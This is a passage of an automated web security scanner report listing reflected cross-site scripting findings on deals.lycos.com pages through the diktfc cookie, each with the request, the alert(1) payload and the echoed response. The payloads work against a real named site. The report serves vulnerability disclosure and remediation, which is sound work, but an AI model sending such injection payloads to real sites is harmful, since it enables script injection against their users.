Path:   /deal/element-40-1080p-lcd-hdtv-350-414616

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe5d1"><script>alert(1)</script>c619991de16 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
g src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16&amp;cj=1" alt="tracker" />
...[SNIP]...

1.181. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa24"><script>alert(1)</script>1fe7a425fe9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9&amp;cj=1" alt="tracker" />
...[SNIP]...

1.182. http://deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce470"%3balert(1)//88a1fe2d76c was submitted in the diktfc cookie. This input was echoed as ce470";alert(1)//88a1fe2d76c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470"%3balert(1)//88a1fe2d76c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470";alert(1)//88a1fe2d76c"
});
</script>
...[SNIP]...

1.183. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e7d6"%3balert(1)//c92b2a5a915 was submitted in the diktfc cookie. This input was echoed as 9e7d6";alert(1)//c92b2a5a915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6"%3balert(1)//c92b2a5a915; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6";alert(1)//c92b2a5a915"
});
</script>
...[SNIP]...

1.184. http://deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56d7"><script>alert(1)</script>c863840866d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.185. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/free-iphone-applications-413656

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48163"><script>alert(1)</script>6916582d15c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/free-iphone-applications-413656&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.186. http://deals.lycos.com/deal/free-iphone-applications-413656 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/free-iphone-applications-413656

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f8d2"%3balert(1)//6cf56fb792b was submitted in the diktfc cookie. This input was echoed as 2f8d2";alert(1)//6cf56fb792b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2"%3balert(1)//6cf56fb792b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/free-iphone-applications-413656",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2";alert(1)//6cf56fb792b"
});
</script>
...[SNIP]...

1.187. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/hp-home-coupons-up-to-400-off-414278

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c4"><script>alert(1)</script>9c619f6f3d6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
g src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.188. http://deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/hp-home-coupons-up-to-400-off-414278

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5635"%3balert(1)//0d3ef562288 was submitted in the diktfc cookie. This input was echoed as a5635";alert(1)//0d3ef562288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635"%3balert(1)//0d3ef562288; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
xt/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635";alert(1)//0d3ef562288"
});
</script>
...[SNIP]...

1.189. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/iphone-app-price-cuts-deals-from-1-414092

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d30a"%3balert(1)//dda5081c78 was submitted in the diktfc cookie. This input was echoed as 1d30a";alert(1)//dda5081c78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a"%3balert(1)//dda5081c78; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a";alert(1)//dda5081c78"
});
</script>
...[SNIP]...

1.190. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/iphone-app-price-cuts-deals-from-1-414092

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>f4fd1e37b84 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
